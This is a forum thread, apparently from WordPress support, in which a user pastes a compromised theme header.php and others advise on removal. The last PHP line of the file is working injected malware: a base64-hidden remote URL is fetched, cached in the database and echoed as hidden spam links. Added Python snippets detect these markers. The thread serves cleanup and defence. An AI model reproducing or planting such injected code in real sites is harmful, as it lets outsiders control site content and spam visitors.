
Evil exploit in Header.php File (7 posts)

  1. Ulysses31
    Member
    Posted 2 years ago

    Has anyone else been hit by this - how to stop the exploit happening again?
    I deleted the code twice now :(

    You can see the nasty stuff in the last lines at the bottom. Inserts about 600 invisible links for Viagra in your html source. XD

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    
    <head profile="http://gmpg.org/xfn/11">
    
            <META name="verify-v1" content="vr+EovmENQbzitArGOodFTd10dFtSJ3h8bCkBPVdTdE=" />
    
    	<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
    
    	<title><?php bloginfo('name'); ?> <?php if ( is_single() ) { ?> &raquo; Blog Archive <?php } ?> <?php wp_title(); ?></title>
    
    	<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats -->
    
    <?php if (eregi("MSIE",getenv("HTTP_USER_AGENT")) ||
           eregi("Internet Explorer",getenv("HTTP_USER_AGENT"))) { ?><link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/style-ie.css"/>
    <?php } else { ?>
    
    <link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/style-ie.css"/>
    
    <?php } ?>
    
    	<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
    	<link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
    	<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
    	<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
    
    	<style type="text/css" media="screen"></style>
    
    	<?php wp_head(); ?>
    </head>
    <body>
    	<div id="topbar">
    	<div class="searchform"><?php include (TEMPLATEPATH . '/searchform.php'); ?></div>
    	<div class="nav"><a href="<?php echo get_settings('home'); ?>">Home</a>&nbsp;&nbsp;|&nbsp;&nbsp;
    <!--
    	<a href="">Link 1</a>&nbsp;&nbsp;|&nbsp;&nbsp;
    	<a href="">Link 2</a>&nbsp;&nbsp;|&nbsp;&nbsp;
    	<a href="">Link 3</a>&nbsp;&nbsp;|&nbsp;&nbsp;
    	<a href="">Link 4</a>&nbsp;&nbsp;|&nbsp;&nbsp;
    	<a href="">Link 5</a>&nbsp;&nbsp;|&nbsp;&nbsp;
    -->
    </div>
    
    	</div>
    	<div id="headerimg"></div>
    
    <div id="page-top"><div id="page-bottom"><div id="page">
    <?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3Mv'; $opt_id='0687d858c81740b39cf1d01bdde2afc7'; $blarr=get_option('cache_vars'); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.md5'))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.txt')); update_option('cache_vars',$blarr); } $blarr=unserialize(base64_decode(get_option('cache_vars'))); if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=''; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>'; echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>
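    An added example (not code from this thread or from WordPress) that scans theme PHP files for the combination seen in that last line, a base64-encoded URL handed to wp_remote_fopen(), the result cached with update_option(), and a [LINKS] placeholder, and decodes any such literal so you can see where the file fetches from. The sample string and the example.invalid host are constructed, not the values from the post.

```python
import base64
import re
from pathlib import Path

# Markers of the injection pasted above: a base64-encoded URL fed to wp_remote_fopen(),
# the fetched list cached with update_option(), then echoed in place of [LINKS].
INJECTION_MARKERS = ("base64_decode(", "wp_remote_fopen(", "update_option(", "[LINKS]")
# Single-quoted PHP literal long enough to be an encoded URL rather than a short token
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")

def decode_url_literals(source):
    """Return every quoted base64 literal in source that decodes to an http(s) URL."""
    urls = []
    for match in B64_LITERAL.finditer(source):
        try:
            text = base64.b64decode(match.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls

def scan_source(source):
    """Flag a file when most of the injection markers co-occur, and list any hidden URLs."""
    markers = [m for m in INJECTION_MARKERS if m in source]
    return {"suspicious": len(markers) >= 3,
            "markers": markers,
            "urls": decode_url_literals(source)}

def scan_theme(theme_dir):
    """Walk a theme (or wp-content) directory and report only the suspicious PHP files."""
    report = {}
    for path in sorted(Path(theme_dir).rglob("*.php")):
        result = scan_source(path.read_text(errors="replace"))
        if result["suspicious"]:
            report[str(path)] = result
    return report

# Constructed sample mirroring the shape of the injected line, with a placeholder host
# (not the domain from the forum post).
_ENCODED = base64.b64encode(b"http://example.invalid/ss/").decode()
SAMPLE_INJECTED = ("<?php $wp_remote_fopen='" + _ENCODED + "'; $opt_id='ID';"
                   " $blarr=get_option('cache_vars'); update_option('cache_vars',"
                   " trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.txt')));"
                   " echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); ?>")
SAMPLE_CLEAN = "<?php wp_head(); ?>\n<title><?php bloginfo('name'); ?></title>"
```

Run scan_theme() against your wp-content directory; a clean header.php produces no entry, and a file that hits three or more markers is listed with the decoded fetch URL.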
  2. Edward Caissie
    Member
    Posted 2 years ago

    Looks suspiciously like a bad theme to me ... which one are you using?

  3. adamt07
    Member
    Posted 2 years ago

    If it's anything similar to a bug that hit mine a couple weeks ago (the gumblar script) you may want to check the images folder for a script labeled image.php and delete it. There's a plugin called "exploit-scanner" that could probably help you a lot.

  4. whooami
    Member
    Posted 2 years ago

    ... if it's anything similar to a bug that hit mine a couple weeks ago (the gumblar script)

    gumblar is most definitely not a bug.

  5. adamt07
    Member
    Posted 2 years ago

    I guess malware script would have been more appropriate...

  6. techguy
    Member
    Posted 2 years ago

    Had the same thing happen. Removed the code and it's gone for now. Now to figure out how it happened in the first place. Any suggestions would be appreciated.

  7. Samuel B
    moderator
    Posted 2 years ago

    Most of the exploits lately take advantage of weak and easily guessed FTP passwords.

    cPanel users are particularly vulnerable with weak passwords because user names carry across all functions:
    control panel, FTP, MySQL, etc.

    If they keep coming back, they are in more than one script or in the database, in which case deleting the code does no good until the DB is taken care of.

    There are plenty of threads here and on Google search that address cleaning of hacked WordPress blogs.

    Also, if you guys are on shared servers, you should report this to your host so they can look into whether other users were also hacked.
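An added example, not from this thread, for the point that the code can also live in the database: the injected line in the first post caches its link list in the cache_vars option as a base64-encoded PHP-serialized array (keys hide_text, links and random), so deleting header.php alone leaves that row behind. This decodes one wp_options value (pulled with, for example, SELECT option_value FROM wp_options WHERE option_name = 'cache_vars') and reports the hidden links; the serialized sample and the spam-*.invalid hosts are constructed.

```python
import base64
import re

# The cached option is base64(serialize(array)). Rather than a full PHP unserializer,
# this looks for the two keys the injected code reads and pulls out any serialized
# string that is an http(s) URL, which is where the hidden link targets live.
SERIALIZED_URL = re.compile(r's:\d+:"(https?://[^"]+)"')
PAYLOAD_KEYS = ('s:9:"hide_text"', 's:5:"links"')

def inspect_option_value(value):
    """Decode one wp_options value and report whether it looks like the cached link list."""
    try:
        raw = base64.b64decode(value.strip(), validate=True).decode("utf-8", "replace")
    except ValueError:
        # Ordinary option values ("closed", "1", serialized text) are not valid base64
        return {"payload": False, "links": [], "hidden_markup": False}
    is_payload = all(k in raw for k in PAYLOAD_KEYS)
    return {"payload": is_payload,
            "links": SERIALIZED_URL.findall(raw) if is_payload else [],
            # hide_text is the wrapper the links are echoed into; it is typically hidden CSS
            "hidden_markup": "display:none" in raw or "visibility:hidden" in raw}

# Constructed sample in the shape the injected code unserializes (placeholder hosts,
# not real link data).
_SERIALIZED = ('a:3:{s:9:"hide_text";s:39:"<div style="display:none">[LINKS]</div>";'
               's:5:"links";a:2:{s:5:"term1";s:24:"http://spam-a.invalid/p/";'
               's:5:"term2";s:24:"http://spam-b.invalid/q/";}s:6:"random";b:1;}')
SAMPLE_OPTION = base64.b64encode(_SERIALIZED.encode()).decode()
SAMPLE_BENIGN = base64.b64encode(b'a:1:{s:5:"theme";s:7:"default";}').decode()
```

If the row is flagged, delete it along with the injected code in every script, otherwise the next page load just re-echoes the cached links.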
